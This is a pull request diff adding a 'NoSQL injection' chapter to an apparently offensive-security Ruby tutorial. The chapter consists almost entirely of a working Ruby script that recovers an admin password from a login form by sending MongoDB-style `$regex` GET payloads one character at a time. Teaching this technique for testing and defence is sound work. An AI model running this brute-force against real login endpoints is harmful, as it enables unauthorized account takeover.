Merge pull request #70 from rubyfu/noraj/nosql

Add NoSQL injection

Author: KINGSABRI

SUMMARY.md

@@ -40,6 +40,7 @@
   * [AMQP](module-0x3-or-network-kung-fu/amqp.md)
 * [Module 0x4 \| Web Kung Fu](module-0x4-or-web-kung-fu/README.md)
   * [SQL Injection Scanner](module-0x4-or-web-kung-fu/sql-injection-scanner.md)
+  * [NoSQL Injection](module-0x4-or-web-kung-fu/nosql-injection.md)
   * [Databases](module-0x4-or-web-kung-fu/databases.md)
   * [Extending Burp Suite](module-0x4-or-web-kung-fu/extending-burp-suite.md)
   * [Browser Manipulation](module-0x4-or-web-kung-fu/browser-manipulation.md)

module-0x4-or-web-kung-fu/nosql-injection.md

@@ -0,0 +1,34 @@
+# NoSQL injection
+
+## Blind NoSQL
+
+Exploit a vulnerable authentication form to find a user's password exploit regexp bruteforce.
+
+### GET
+
+```ruby
+require 'httpx'
+
+username = 'admin'
+password = ''
+url = 'http://example.org/login'
+# CHARSET = (?!..?~).to_a # all ASCII printable characters
+CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
+GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
+session = HTTPX.plugin(:persistent)
+
+while true
+  CHARSET.each do |c|
+    unless GET_EXCLUDE.include?(c)
+      payload = "?username=#{username}&password[$regex]=^#{password + c}"
+      res = session.get(url + payload)
+      if res.body.to_s.match?('Yeah')
+        puts "Found one more char : #{password + c}"
+        password += c
+      end
+    end
+  end
+end
+```
+
+Ref. [PATT](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#get)